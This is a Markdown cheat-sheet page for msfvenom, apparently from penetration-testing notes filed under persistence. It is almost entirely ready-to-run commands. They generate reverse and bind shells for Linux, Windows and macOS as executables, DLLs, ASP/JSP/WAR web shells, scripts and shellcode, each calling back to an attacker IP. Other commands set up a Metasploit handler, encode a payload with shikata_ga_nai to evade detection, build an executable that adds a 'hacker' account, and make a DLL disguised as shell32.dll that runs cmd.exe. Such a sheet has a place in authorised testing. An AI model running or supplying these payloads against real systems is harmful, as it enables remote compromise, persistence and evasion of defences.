---
layout: default
title: MSFVenom
parent: Persistence
nav_order: 10
---

Craft payloads

## Metasploit Handler
```bash
sudo msfconsole
use exploit/multi/handler
set PAYLOAD <Payload name>
set RHOST <Remote IP>
set LHOST <Local IP>
set LPORT <Local Port>
run
```

## Options

```bash
msfvenom -l payloads
msfvenom -l encoders
msfvenom -l archs
msfvenom -l platforms
```

```
    -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
    -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options               List --payload <value>'s standard, advanced and evasion options
    -f, --format          <format>   Output format (use --list formats to list)
    -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
    -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
        --platform        <platform> The platform for --payload (use --list platforms to list)
    -o, --out             <path>     Save the payload to a file
    -b, --bad-chars       <list>     Characters to avoid example: '\x00\xff'
    -s, --space           <length>   The maximum size of the resulting payload
    -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
    -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
```

# Binaries Payloads

## Linux Meterpreter Reverse Shell
```bash
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.10.14 LPORT=443 -f elf > shell.elf
```

## Linux Bind Meterpreter Shell
```bash
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=10.10.10.14 LPORT=443 -f elf > bind.elf
```

## Linux Bind Shell
```bash
msfvenom -p generic/shell_bind_tcp RHOST=10.10.10.14 LPORT=443 -f elf > term.elf
```

## Windows Meterpreter Reverse TCP Shell
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.14 LPORT=443 -f exe > shell.exe
```

## Windows DlL
```bash
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.10.14 LPORT=443 -f dll > reverse_32bit.dll
msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=192.168.137.130 LPORT=9500 > reverse_64bit.dll
```

## Windows Reverse TCP Shell
```bash
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.10.14 LPORT=443 -f exe > shell.exe
```

## Windows Encoded Meterpreter Windows Reverse Shell
```bash
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
```

## Mac Reverse Shell
```bash
msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.10.10.14 LPORT=443 -f macho > shell.macho
```

## Mac Bind Shell
```bash
msfvenom -p osx/x86/shell_bind_tcp RHOST=10.10.10.14 LPORT=443 -f macho > bind.macho
```

# Web Payloads

## ASP Meterpreter Reverse TCP
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.14 LPORT=443 -f asp > shell.asp
```

## JSP Java Meterpreter Reverse TCP
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.14 LPORT=443 -f raw > shell.jsp
```

## WAR
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.14 LPORT=443 -f war > shell.war
```

# Scripting Payloads

## Python Reverse Shell
```bash
msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.14 LPORT443 -f raw > shell.py
```

## Bash Unix Reverse Shell
```bash
msfvenom -p cmd/unix/reverse_bash LHOST=10.10.10.14 LPORT=443 -f raw > shell.sh
```

## Perl Unix Reverse shell
```bash
msfvenom -p cmd/unix/reverse_perl LHOST=10.10.10.14 LPORT=443 -f raw > shell.pl
```

# Shellcode

## Windows Meterpreter Reverse TCP Shellcode
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.14 LPORT=443 -f <language>
```

## Linux Meterpreter Reverse TCP Shellcode
```bash
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.10.14 LPORT=443 -f <language>
```

## Mac Reverse TCP Shellcode
```bash
msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.10.10.14 LPORT=443 -f <language>
```

## Create User
```bash
msfvenom -p windows/adduser USER=hacker PASS=Hacker123$ -f exe > adduser.exe
```

## Exec command
```bash
msfvenom -f dll -p windows/exec CMD="cmd.exe" -o shell32.dll
```